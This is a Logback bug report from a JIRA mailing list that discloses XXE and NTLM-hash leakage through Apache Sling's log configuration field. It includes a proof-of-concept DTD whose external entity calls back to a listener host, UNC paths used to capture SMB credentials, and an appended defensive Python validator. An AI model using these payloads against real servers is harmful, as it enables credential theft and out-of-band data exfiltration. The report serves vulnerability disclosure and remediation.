[logback-dev] [JIRA] (LOGBACK-1465) xxe and Information disclosure vulnerabilities in Logback
QOS.CH (JIRA)
noreply-jira at qos.ch
Thu May 9 09:48:00 CEST 2019
shuiboye created LOGBACK-1465:
---------------------------------
Summary: xxe and Information disclosure vulnerabilities in Logback
Key: LOGBACK-1465
URL: https://jira.qos.ch/browse/LOGBACK-1465
Project: logback
Issue Type: Bug
Components: logback-core
Environment: I tested the latest Apache Sling (version 11) integrated with Logback, running on Windows
Reporter: shuiboye
Assignee: Logback dev list
Priority: Critical
Attachments: image-2019-05-09-15-41-28-419.png, image-2019-05-09-15-41-45-829.png, image-2019-05-09-15-43-09-668.png, image-2019-05-09-15-43-25-103.png
Hi, I found XXE and information disclosure vulnerabilities in Logback when testing the latest Apache Sling (version 11) integrated with Logback.
First I log in to Sling as an admin.
*XXE*
The vulnerable url is [http://127.0.0.1:8080/system/console/configMgr/org.apache.sling.commons.log.LogManager].
In the "Logback Config File" field, I input "\\192.168.0.102\c$\xxe.xml" as shown below.
!image-2019-05-09-15-43-09-668.png!
The content of the xxe.xml under the c:\ directory on the server 192.168.0.102 is
{code:xml}
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % sp SYSTEM "http://192.168.0.102:8090/sling">
%sp;
]>
{code}
After clicking "save", the netcat listener running on the server 192.168.0.102 on port 8090 receives the request as shown below.
!image-2019-05-09-15-43-25-103.png!
*Information disclosure (Windows username and NTLM password hash)*
The vulnerable url is [http://127.0.0.1:8080/system/console/configMgr/org.apache.sling.commons.log.LogManager].
To confirm that the "Logback Config File" field can leak the server's Windows username and NTLM password hash to remote attackers over SMB, I used another machine to visit the vulnerable page, whose url is also [http://192.168.0.102:8080/system/console/configMgr/org.apache.sling.commons.log.LogManager].
In the "Logback Config File" field, I input "\\192.168.9.128\test". The ip 192.168.9.128 is another machine used to capture SMB traffic.
!image-2019-05-09-15-41-28-419.png!
After clicking "save", the machine with ip 192.168.9.128 successfully captures the Windows username and NTLM password hash over SMB.
!image-2019-05-09-15-41-45-829.png!
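Both findings above come from the same root cause: a user-supplied "Logback Config File" value is handed to the file system and to an XML parser without validation. The following added example (written for this note, not code from the Logback or Sling projects) shows the two checks a defender would put in front of such a field: rejecting UNC and out-of-tree paths before the file is ever opened, so no SMB authentication is attempted against a remote host, and refusing any configuration XML that carries a DOCTYPE, so external entities are never declared. The function names, the allowed directory {{C:\sling\conf}} and the sample inputs are assumptions made for the example; the DTD sample is the one quoted in this report.

```python
import xml.parsers.expat
from pathlib import PureWindowsPath

# Hypothetical directory from which logback config files may be loaded (assumption).
DEFAULT_ALLOWED_DIR = r"C:\sling\conf"


def check_config_path(path: str, allowed_dir: str = DEFAULT_ALLOWED_DIR):
    """Return (ok, detail). Rejects UNC paths, traversal and anything outside allowed_dir.

    PureWindowsPath is used so the check behaves the same on any host; it parses
    Windows syntax without touching the local file system.
    """
    p = PureWindowsPath(path)
    # \\host\share\... : opening this makes Windows authenticate to 'host' over SMB.
    if p.drive.startswith("\\\\"):
        return False, "UNC path rejected: would trigger SMB authentication to a remote host"
    if ".." in p.parts:
        return False, "path traversal rejected"
    base = PureWindowsPath(allowed_dir)
    full = p if p.is_absolute() else base / p
    # Windows pure paths compare case-insensitively, so C:\Sling\Conf == c:\sling\conf.
    if full != base and base not in full.parents:
        return False, f"path outside allowed directory {allowed_dir}"
    return True, str(full)


class DoctypeRejected(ValueError):
    """Raised from inside the expat callback to abort parsing at the DOCTYPE."""


def check_config_xml(data: bytes):
    """Return (ok, detail). Refuses any document containing a DOCTYPE declaration.

    Without a DOCTYPE there is no place to declare an external entity, which is
    what the quoted xxe.xml relies on. Parameter-entity parsing is also switched
    off so that even a DOCTYPE that slipped past the handler could not fetch
    anything over the network.
    """
    parser = xml.parsers.expat.ParserCreate()
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE '{name}' is not allowed in a logback configuration")

    parser.StartDoctypeDeclHandler = reject_doctype
    try:
        parser.Parse(data, True)
    except DoctypeRejected as exc:
        return False, str(exc)
    except xml.parsers.expat.ExpatError as exc:
        return False, f"malformed XML: {exc}"
    return True, "ok"


# Constructed sample inputs: the DTD quoted in this report and a benign config.
XXE_SAMPLE = (
    b'<?xml version="1.0"?>\n'
    b'<!DOCTYPE r [\n'
    b'<!ENTITY % sp SYSTEM "http://192.168.0.102:8090/sling">\n'
    b'%sp;\n'
    b']>\n'
)
BENIGN_SAMPLE = b'<configuration><root level="INFO"/></configuration>'


if __name__ == "__main__":
    for candidate in (r"\\192.168.0.102\c$\xxe.xml", r"\\192.168.9.128\test",
                      r"..\secret.xml", r"C:\Windows\win.ini", "logback.xml"):
        print(candidate, "->", check_config_path(candidate))
    print("xxe sample  ->", check_config_xml(XXE_SAMPLE))
    print("benign      ->", check_config_xml(BENIGN_SAMPLE))
```

The path check runs before any open() call, which is the only point at which the SMB leak can be prevented; the XML check runs on the bytes already read from the approved file, so a DOCTYPE is refused before the parser can evaluate %sp;.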